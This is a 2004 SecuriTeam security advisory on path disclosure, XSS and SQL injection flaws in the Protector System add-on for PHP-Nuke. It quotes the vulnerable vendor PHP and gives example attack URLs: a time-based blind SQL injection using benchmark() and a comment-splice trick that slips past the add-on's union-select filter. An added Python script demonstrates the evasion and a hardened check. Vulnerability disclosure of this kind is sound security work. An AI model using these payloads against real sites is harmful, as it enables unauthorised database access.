[UNIX] Protector System Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 04/25/04
To: list@securiteam.com Date: 25 Apr 2004 19:15:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Protector System Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
Protector is a PHP-Nuke add-on that blocks IP addresses and several types
of attacks, such as SQL injection.
Several classes of vulnerabilities have been found in Protector, among
them full path disclosure, cross-site scripting and SQL injection.
DETAILS
Vulnerable Systems:
* Protector System for PHP-Nuke version 1.15b1 and prior
Full Path Disclosure
In the integrated network query tool the variable portNum is not validated.
Passing a non-numeric value causes PHP to emit a warning that includes the
full filesystem path of the installation.
An example URL could look something along the lines of:
http://localhost/nuke72/admin/modules/blocker_query.php?target=foobar.com&queryType=all&portNum=foobar
And will result in the following error message:
Warning: fsockopen() expects parameter 2 to be long, string given in D:\apache_wwwroot\nuke72\admin\modules\blocker_query.php on line 305
Port foobar does not appear to be open.
Cross-site Scripting
The 'target' variable is not properly sanitized before being echoed back,
which allows an attacker to inject script into the page (XSS).
An example URL:
http://localhost/nuke72/admin/modules/blocker_query.php?target=foobar.com">[xss code here]
SQL Injection
The script 'blocker.php' is vulnerable to an SQL injection attack.
Looking at /includes/blocker.php line 252 (vendor code, reformatted, with
the concatenation operator that was lost in line wrapping restored):
// Build $last_page from the script name and the raw query string
if( isset( $_SERVER ) ) { $ref_addr = $_SERVER['HTTP_REFERER']; }
else { $ref_addr = getenv( 'HTTP_REFERER' ); }
if( isset( $_SERVER ) )
{
    $last_page = $_SERVER['SCRIPT_NAME'];
    if (($_SERVER['QUERY_STRING']) != "") { $last_page = $last_page . "?" . $_SERVER['QUERY_STRING']; }
    $query_blocker = $_SERVER['QUERY_STRING'];
}
else
{
    $last_page = getenv('SCRIPT_NAME');
    if ((getenv('QUERY_STRING')) != "") { $last_page = $last_page . "?" . getenv('QUERY_STRING'); }
}
// urldecode() turns an encoded %27 in the query string into a literal single quote
$last_page = urldecode($last_page);
The $last_page variable contains the URL-decoded QUERY_STRING. If %27 is
added to the query, urldecode() returns a single quote in its place, opening
the way for an SQL injection. Looking further:
###################################
#Page Tracker Function by Kipuka
#
###################################
if ($tracker_del_on == 1) {
    $max_tracker_check = $db->sql_query("SELECT count(*) as count FROM ".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id'");
    $numrows = $db->sql_numrows($max_tracker_check);
    if ($numrows > 0) {
        list($count) = $db->sql_fetchrow($max_tracker_check);
    }
    //die("$last_page");
    if ($count < $tracker_max_b) {
        // $last_page is interpolated into the INSERT unescaped, after urldecode()
        $db->sql_query("INSERT DELAYED INTO ".$prefix."_blocked_pagetracker (last_page ,page_date ,id_tracker) VALUES ('$last_page', '$date', '$access_id')");
        $sqlx = "INSERT DELAYED INTO ".$prefix."_blocked_pagetracker (last_page ,page_date ,id_tracker) VALUES ('$last_page', '$date', '$access_id')";
        $xxx = mysql_error();
        //die("$xxx");
    } else {
        $tracker_limitB = $count - $tracker_max_b;
        $result = $db->sql_query("SELECT id FROM ".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id' ORDER BY page_date LIMIT ".$tracker_limitB.",1");
        $numrows = $db->sql_numrows($result);
        if ($numrows > 0) {
            $row = $db->sql_fetchrow($result);
            $page_id = $row['id'];
            $db->sql_query("DELETE FROM ".$prefix."_blocked_pagetracker WHERE id_tracker = '$access_id' AND id <= '$page_id'");
        }
        $xxx = mysql_error();
        // leftover debug call in the vendor code, left as found
        die("$xxx");
        // same unescaped interpolation of $last_page as above
        $db->sql_query("INSERT INTO ".$prefix."_blocked_pagetracker (last_page ,page_date ,id_tracker) VALUES ('$last_page', '$date', '$access_id')");
    }
}
An SQL injection is therefore possible, not through a "SELECT ... FROM"
statement but through the "INSERT INTO" statement that stores $last_page.
On the other hand, some built-in MySQL functions can help an attacker
learn about the environment. Some notable functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
VERSION()
Since the attacker gets no visual feedback from the script, only blind
("blindfolded") attacks can be used, such as the following (easily
implemented in PHP, Perl or Python):
http://localhost/nuke72/index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)/*
Bypassing of SQL Injection Filters
The Protector system implements several filters to prevent SQL injections
and XSS attacks:
..
//IF the user sending any ?$_SERVER["HTTP_REFERER"] then continue
if (strlen($_SERVER["HTTP_REFERER"]) > 0) {
    //If the user is POSTing from another server do a scan
    if(eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\ )*select\ |\.\.\/", $sTemp) && !ereg("(http://$_SERVER[HTTP_HOST])", $_SERVER["HTTP_REFERER"]))
    {
        $original_ip = long2ip(-(4294967296-$ipcheck));
        $the_error = "User $the_blocked_user with IP $original_ip tried to send information thru a POST method\r\n"
..
    if(eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\ )*select\ |\.\.\/", $sTemp))
    {
        //Just send a mail incase =)
        if ($pro_mail && $pro_mail != '' && $mail_blocker == '1') {
            mail($pro_mail, $blocker_subject, $the_unset_error, $headers); }
        unset($_POST[$FormFieldName]);
        echo "<p><h1>Your Attempt to use SQL exploit was blocked</h1>";
        echo "<i>Powered whit Protector System</i>";
        die();
    }
}
..
if($sec_cookieB == '1')
{
    foreach ($_COOKIE as $cookie_name => $value_cookie) {
        $result = $db ->sql_query("SELECT cookie FROM ".$prefix."_blocked_agent WHERE cookie = '$cookie_name'");
        if($db->sql_numrows($result)>0 && !empty($_COOKIE))
        {
            if (eregi("union\ |&#?[a-zA-Z0-9]+;|:\/\/|\.\.\/|[$<>{}\(\)\"'`]", $value_cookie)) {
                $value_cookie = htmlspecialchars($value_cookie, ENT_QUOTES);
                setcookie($cookie_name,"", time() - 3600);
                unset($_COOKIE[$cookie_name]);
            }
        }
..
###########################################################################
#Block unvanted GET code!
#Security scan of REQUEST_METHOD GET
#
############################################################################
if($sec_getB == '1')
{
    if ((eregi("admin.php", $_SERVER['PHP_SELF']) && preg_match("/\?admin/", "$last_page")) OR (eregi("(^|[^a-zA-Z0-9])union(\ )+(all\ |distinct\ )?(\ )*select\ |\.\.\/", $last_page)) OR (stristr($last_page, "admin=")))
    {
..
Not only GET, but also POST and COOKIE variables benefit from this
sanitization. However, there are evasion techniques, some of which are
described in <http://www.securiteam.com/securityreviews/5FP0O0KCKM.html>
SQL Injection Signatures Evasion (the paper describes various methods that
can be used to circumvent SQL injection filters).
Using these evasion techniques, one can issue a request such as this:
http://localhost/nuke72/index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE
which causes Protector to complain that the IP 127.0.0.1 has been blocked.
However, structuring the query a bit differently:
http://localhost/nuke72/index.php?foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE
gives the desired result: the filter lets the query pass, because the
signature expects the keyword "union" as one contiguous token.
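The following Python script is an added example, not part of the advisory or of Protector. It re-implements how blocker.php assembles $last_page (script name, "?", raw query string, then urldecode()), ports the eregi() union/select signature from the GET scan above, and runs both advisory URLs through it: the plain UNION SELECT request is caught, the U/**/NION splice is not, and a normalized check that strips /* */ comments before matching closes that particular gap. The script path /nuke72/index.php and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Port of the eregi() signature from blocker.php's GET/POST scan (case-insensitive).
UNION_SELECT_SIG = re.compile(
    r"(^|[^a-zA-Z0-9])union( )+(all |distinct )?( )*select |\.\./", re.IGNORECASE)

# Added for the hardened check (not in Protector): MySQL inline comments,
# so that "U/**/NION" collapses back to "UNION" before the signature runs.
MYSQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def build_last_page(script_name, query_string):
    """Mirror blocker.php: SCRIPT_NAME, '?', raw QUERY_STRING, then urldecode().
    This is the value later interpolated into INSERT ... VALUES ('$last_page', ...)."""
    last_page = script_name
    if query_string != "":
        last_page = last_page + "?" + query_string
    return unquote(last_page)


def protector_filter_blocks(last_page):
    """The original check: the signature applied directly to the decoded page."""
    return UNION_SELECT_SIG.search(last_page) is not None


def hardened_filter_blocks(last_page):
    """Same signature after collapsing /* */ comments and whitespace runs.
    A signature is defence in depth only; the fix for blocker.php is to escape
    or parameterise $last_page before it reaches the INSERT."""
    normalized = re.sub(r"\s+", " ", MYSQL_COMMENT.sub("", last_page))
    return UNION_SELECT_SIG.search(normalized) is not None


if __name__ == "__main__":
    script = "/nuke72/index.php"  # path assumed from the advisory's URLs
    samples = {  # query strings exactly as they appear in the advisory's URLs
        "blocked": "foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE",
        "evaded": "foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE",
        "quote": "foobar%27",  # %27 becomes a literal quote after urldecode()
    }
    for name, qs in samples.items():
        page = build_last_page(script, qs)
        print(f"{name:8s} original={protector_filter_blocks(page)!s:5s} "
              f"hardened={hardened_filter_blocks(page)!s:5s} {page}")
```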
ADDITIONAL INFORMATION
The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.